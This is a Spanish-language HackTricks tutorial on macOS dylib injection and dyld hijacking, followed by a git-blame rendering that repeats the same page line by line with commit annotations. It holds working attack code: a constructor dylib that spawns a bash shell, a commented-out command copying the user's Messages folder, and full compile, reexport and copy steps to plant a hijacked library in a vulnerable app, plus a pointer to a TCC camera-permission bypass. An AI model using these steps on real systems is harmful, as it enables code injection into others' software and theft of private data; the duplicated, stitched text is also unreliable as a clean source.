hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md

# macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES

<details>

<summary><strong>Aprende hacking en AWS desde cero hasta experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén la [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## DYLD\_INSERT\_LIBRARIES Ejemplo básico

**Biblioteca a inyectar** para ejecutar una shell:
```c
// gcc -dynamiclib -o inject.dylib inject.c

#include <syslog.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
__attribute__((constructor))

void myconstructor(int argc, const char **argv)
{
syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]);
printf("[+] dylib injected in %s\n", argv[0]);
execv("/bin/bash", 0);
//system("cp -r ~/Library/Messages/ /tmp/Messages/");
}
```
Binario a atacar:
```c
// gcc hello.c -o hello
#include <stdio.h>

int main()
{
printf("Hello, World!\n");
return 0;
}
```
Inyección:
```bash
DYLD_INSERT_LIBRARIES=inject.dylib ./hello
```
## Ejemplo de Secuestro de Dyld

El binario vulnerable objetivo es `/Applications/VulnDyld.app/Contents/Resources/lib/binary`.

{% tabs %}
{% tab title="entitlements" %}
<pre class="language-bash" data-overflow="wrap"><code class="lang-bash">codesign -dv --entitlements :- "/Applications/VulnDyld.app/Contents/Resources/lib/binary"
<strong>[...]com.apple.security.cs.disable-library-validation[...]
</strong></code></pre>
{% endtab %}

{% tab title="LC_RPATH" %}
{% code overflow="wrap %}
```bash
# Check where are the @rpath locations
otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep LC_RPATH -A 2
cmd LC_RPATH
cmdsize 32
path @loader_path/. (offset 12)
--
cmd LC_RPATH
cmdsize 32
path @loader_path/../lib2 (offset 12)
```
{% endcode %}
{% endtab %}

{% tab title="@rpath" %}
{% code overflow="wrap" %}
```bash
# Check librareis loaded using @rapth and the used versions
otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep "@rpath" -A 3
name @rpath/lib.dylib (offset 24)
time stamp 2 Thu Jan  1 01:00:02 1970
current version 1.0.0
compatibility version 1.0.0
# Check the versions
```
{% endcode %}
{% endtab %}
{% endtabs %}

Con la información anterior sabemos que **no está verificando la firma de las bibliotecas cargadas** e intenta cargar una biblioteca desde:

- `/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib`
- `/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib`

Sin embargo, la primera no existe:
```bash
pwd
/Applications/VulnDyld.app

find ./ -name lib.dylib
./Contents/Resources/lib2/lib.dylib
```
Entonces, ¡es posible secuestrarlo! Crea una biblioteca que **ejecute algún código arbitrario y exporte las mismas funcionalidades** que la biblioteca legítima al reexportarla. Y recuerda compilarla con las versiones esperadas:

{% code title="lib.m" %}
```objectivec
#import <Foundation/Foundation.h>

__attribute__((constructor))
void custom(int argc, const char **argv) {
NSLog(@"[+] dylib hijacked in %s", argv[0]);
}
```
{% endcode %}

Compílalo:

{% code overflow="wrap" %}
```bash
gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" -o "/tmp/lib.dylib"
# Note the versions and the reexport
```
{% endcode %}

La ruta de reexportación creada en la biblioteca es relativa al cargador, cambiémosla por una ruta absoluta a la biblioteca a exportar:

{% code overflow="wrap" %}
```bash
#Check relative
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
cmd LC_REEXPORT_DYLIB
cmdsize 48
name @rpath/libjli.dylib (offset 24)

#Change the location of the library absolute to absolute path
install_name_tool -change @rpath/lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" /tmp/lib.dylib

# Check again
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
cmd LC_REEXPORT_DYLIB
cmdsize 128
name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24)
```
{% endcode %}

Finalmente, simplemente cópialo a la **ubicación secuestrada**:

{% code overflow="wrap" %}
```bash
cp lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib"
```
{% endcode %}

Y **ejecutar** el binario y verificar que la **biblioteca se cargó**:

<pre class="language-context"><code class="lang-context">"/Applications/VulnDyld.app/Contents/Resources/lib/binary"
<strong>2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary
</strong>Usage: [...]
</code></pre>

{% hint style="info" %}
Un buen artículo sobre cómo abusar de esta vulnerabilidad para abusar de los permisos de la cámara de Telegram se puede encontrar en [https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/)
{% endhint %}

## Escala Mayor

Si planeas intentar inyectar bibliotecas en binarios inesperados, podrías verificar los mensajes de eventos para descubrir cuándo se carga la biblioteca dentro de un proceso (en este caso, elimina el printf y la ejecución de `/bin/bash`).
```bash
sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"'
```
<details>

<summary><strong>Aprende hacking en AWS desde cero hasta experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Comparte tus trucos de hacking enviando PRs a los** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.

</details>
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:25:00 +00:00			`# macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES`
f 2023-06-05 18:30:03 +00:00
			`<details>`

Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:25:00 +00:00			`<summary><strong>Aprende hacking en AWS desde cero hasta experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
f 2023-06-05 18:30:03 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:35:35 +00:00			`Otras formas de apoyar a HackTricks:`

Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:25:00 +00:00			`* Si deseas ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Obtén la [merchandising oficial de PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o síguenos en Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Comparte tus trucos de hacking enviando PRs a los repositorios de [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
f 2023-06-05 18:30:03 +00:00
			`</details>`

Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:25:00 +00:00			`## DYLD\_INSERT\_LIBRARIES Ejemplo básico`
f 2023-06-05 18:30:03 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:35:35 +00:00			`Biblioteca a inyectar para ejecutar una shell:`
f 2023-06-05 18:30:03 +00:00			```c
			`// gcc -dynamiclib -o inject.dylib inject.c`

			`#include <syslog.h>`
			`#include <stdio.h>`
			`#include <unistd.h>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-19 23:04:58 +00:00			`#include <stdlib.h>`
f 2023-06-05 18:30:03 +00:00			`__attribute__((constructor))`

			`void myconstructor(int argc, const char **argv)`
			`{`
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'macos-ha 2023-09-13 23:59:55 +00:00			`syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]);`
			`printf("[+] dylib injected in %s\n", argv[0]);`
			`execv("/bin/bash", 0);`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-19 23:04:58 +00:00			`//system("cp -r ~/Library/Messages/ /tmp/Messages/");`
f 2023-06-05 18:30:03 +00:00			`}`
			```
			`Binario a atacar:`
			```c
			`// gcc hello.c -o hello`
			`#include <stdio.h>`

			`int main()`
			`{`
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'macos-ha 2023-09-13 23:59:55 +00:00			`printf("Hello, World!\n");`
			`return 0;`
f 2023-06-05 18:30:03 +00:00			`}`
			```
			`Inyección:`
			```bash
			`DYLD_INSERT_LIBRARIES=inject.dylib ./hello`
			```
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:25:00 +00:00			`## Ejemplo de Secuestro de Dyld`
f 2023-06-05 18:30:03 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-19 23:04:58 +00:00			El binario vulnerable objetivo es `/Applications/VulnDyld.app/Contents/Resources/lib/binary`.
f 2023-06-05 18:30:03 +00:00
			`{% tabs %}`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-19 23:04:58 +00:00			`{% tab title="entitlements" %}`
			`<pre class="language-bash" data-overflow="wrap"><code class="lang-bash">codesign -dv --entitlements :- "/Applications/VulnDyld.app/Contents/Resources/lib/binary"`
			`<strong>[...]com.apple.security.cs.disable-library-validation[...]`
			`</strong></code></pre>`
			`{% endtab %}`

f 2023-06-05 18:30:03 +00:00			`{% tab title="LC_RPATH" %}`
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:25:00 +00:00			`{% code overflow="wrap %}`
f 2023-06-05 18:30:03 +00:00			```bash
			`# Check where are the @rpath locations`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-19 23:04:58 +00:00			`otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" \| grep LC_RPATH -A 2`
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'macos-ha 2023-09-13 23:59:55 +00:00			`cmd LC_RPATH`
			`cmdsize 32`
			`path @loader_path/. (offset 12)`
f 2023-06-05 18:30:03 +00:00			`--`
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'macos-ha 2023-09-13 23:59:55 +00:00			`cmd LC_RPATH`
			`cmdsize 32`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-19 23:04:58 +00:00			`path @loader_path/../lib2 (offset 12)`
f 2023-06-05 18:30:03 +00:00			```
			`{% endcode %}`
			`{% endtab %}`

Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'macos-ha 2023-09-13 23:59:55 +00:00			`{% tab title="@rpath" %}`
f 2023-06-05 18:30:03 +00:00			`{% code overflow="wrap" %}`
			```bash
			`# Check librareis loaded using @rapth and the used versions`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-19 23:04:58 +00:00			`otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" \| grep "@rpath" -A 3`
			`name @rpath/lib.dylib (offset 24)`
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'macos-ha 2023-09-13 23:59:55 +00:00			`time stamp 2 Thu Jan 1 01:00:02 1970`
			`current version 1.0.0`
f 2023-06-05 18:30:03 +00:00			`compatibility version 1.0.0`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-19 23:04:58 +00:00			`# Check the versions`
f 2023-06-05 18:30:03 +00:00			```
			`{% endcode %}`
			`{% endtab %}`
			`{% endtabs %}`

Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:25:00 +00:00			`Con la información anterior sabemos que no está verificando la firma de las bibliotecas cargadas e intenta cargar una biblioteca desde:`
f 2023-06-05 18:30:03 +00:00
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:25:00 +00:00			- `/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib`
			- `/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib`
f 2023-06-05 18:30:03 +00:00
			`Sin embargo, la primera no existe:`
			```bash
			`pwd`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-19 23:04:58 +00:00			`/Applications/VulnDyld.app`
f 2023-06-05 18:30:03 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-19 23:04:58 +00:00			`find ./ -name lib.dylib`
			`./Contents/Resources/lib2/lib.dylib`
f 2023-06-05 18:30:03 +00:00			```
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:25:00 +00:00			`Entonces, ¡es posible secuestrarlo! Crea una biblioteca que ejecute algún código arbitrario y exporte las mismas funcionalidades que la biblioteca legítima al reexportarla. Y recuerda compilarla con las versiones esperadas:`
f 2023-06-05 18:30:03 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-19 23:04:58 +00:00			`{% code title="lib.m" %}`
f 2023-06-05 18:30:03 +00:00			```objectivec
			`#import <Foundation/Foundation.h>`

			`__attribute__((constructor))`
			`void custom(int argc, const char **argv) {`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-19 23:04:58 +00:00			`NSLog(@"[+] dylib hijacked in %s", argv[0]);`
f 2023-06-05 18:30:03 +00:00			`}`
			```
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:25:00 +00:00			`{% endcode %}`

f 2023-06-05 18:30:03 +00:00			`Compílalo:`
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:25:00 +00:00
			`{% code overflow="wrap" %}`
f 2023-06-05 18:30:03 +00:00			```bash
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-19 23:04:58 +00:00			`gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" -o "/tmp/lib.dylib"`
f 2023-06-05 18:30:03 +00:00			`# Note the versions and the reexport`
			```
			`{% endcode %}`

			`La ruta de reexportación creada en la biblioteca es relativa al cargador, cambiémosla por una ruta absoluta a la biblioteca a exportar:`

			`{% code overflow="wrap" %}`
			```bash
			`#Check relative`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-19 23:04:58 +00:00			`otool -l /tmp/lib.dylib\| grep REEXPORT -A 2`
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'macos-ha 2023-09-13 23:59:55 +00:00			`cmd LC_REEXPORT_DYLIB`
			`cmdsize 48`
			`name @rpath/libjli.dylib (offset 24)`
f 2023-06-05 18:30:03 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-19 23:04:58 +00:00			`#Change the location of the library absolute to absolute path`
			`install_name_tool -change @rpath/lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" /tmp/lib.dylib`
f 2023-06-05 18:30:03 +00:00
			`# Check again`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-19 23:04:58 +00:00			`otool -l /tmp/lib.dylib\| grep REEXPORT -A 2`
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'macos-ha 2023-09-13 23:59:55 +00:00			`cmd LC_REEXPORT_DYLIB`
			`cmdsize 128`
			`name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24)`
f 2023-06-05 18:30:03 +00:00			```
			`{% endcode %}`

Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:25:00 +00:00			`Finalmente, simplemente cópialo a la ubicación secuestrada:`
f 2023-06-05 18:30:03 +00:00
			`{% code overflow="wrap" %}`
			```bash
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-19 23:04:58 +00:00			`cp lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib"`
f 2023-06-05 18:30:03 +00:00			```
			`{% endcode %}`

Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:25:00 +00:00			`Y ejecutar el binario y verificar que la biblioteca se cargó:`
f 2023-06-05 18:30:03 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-19 23:04:58 +00:00			`<pre class="language-context"><code class="lang-context">"/Applications/VulnDyld.app/Contents/Resources/lib/binary"`
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:25:00 +00:00			`<strong>2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary`
			`</strong>Usage: [...]`
f 2023-06-05 18:30:03 +00:00			`</code></pre>`

			`{% hint style="info" %}`
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:35:35 +00:00			`Un buen artículo sobre cómo abusar de esta vulnerabilidad para abusar de los permisos de la cámara de Telegram se puede encontrar en [https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/)`
f 2023-06-05 18:30:03 +00:00			`{% endhint %}`

Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:25:00 +00:00			`## Escala Mayor`
f 2023-06-05 18:30:03 +00:00
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:25:00 +00:00			Si planeas intentar inyectar bibliotecas en binarios inesperados, podrías verificar los mensajes de eventos para descubrir cuándo se carga la biblioteca dentro de un proceso (en este caso, elimina el printf y la ejecución de `/bin/bash`).
f 2023-06-05 18:30:03 +00:00			```bash
			`sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"'`
			```
			`<details>`

Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:25:00 +00:00			`<summary><strong>Aprende hacking en AWS desde cero hasta experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:35:35 +00:00
			`Otras formas de apoyar a HackTricks:`
f 2023-06-05 18:30:03 +00:00
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:25:00 +00:00			`* Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Obtén el [oficial PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o síguenos en Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Comparte tus trucos de hacking enviando PRs a los [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.`
f 2023-06-05 18:30:03 +00:00
			`</details>`